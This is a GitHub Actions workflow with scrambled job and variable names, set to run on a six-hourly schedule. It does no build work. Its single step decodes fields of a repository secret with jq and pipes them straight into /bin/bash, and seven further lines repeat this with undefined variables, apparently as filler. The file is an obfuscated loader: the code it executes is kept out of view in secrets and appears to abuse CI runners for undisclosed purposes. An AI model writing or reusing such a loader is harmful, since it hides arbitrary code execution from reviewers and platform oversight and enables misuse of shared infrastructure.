name: haoshangshu2391
on:
  workflow_dispatch:
  schedule:
    - cron: '10 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haoshangshu2391
        env:
          zzkcs63609: ${{ secrets.zzkcs63609 }}
        run: |
          echo $zzkcs63609 | jq -r .ocokz8954 | /bin/bash
          echo $iyqh6 | jq -r .sd8742 | /bin/bash
          echo $aglb7713 | jq -r .zillm9152 | /bin/bash
          echo $qtm40 | jq -r .cvt2 | /bin/bash
          echo $koo34 | jq -r .j941 | /bin/bash
          echo $wbuqt912 | jq -r .uadq1337 | /bin/bash
          echo $mky708 | jq -r .aa21 | /bin/bash
          echo $q44947 | jq -r .bkvjv3 | /bin/bash

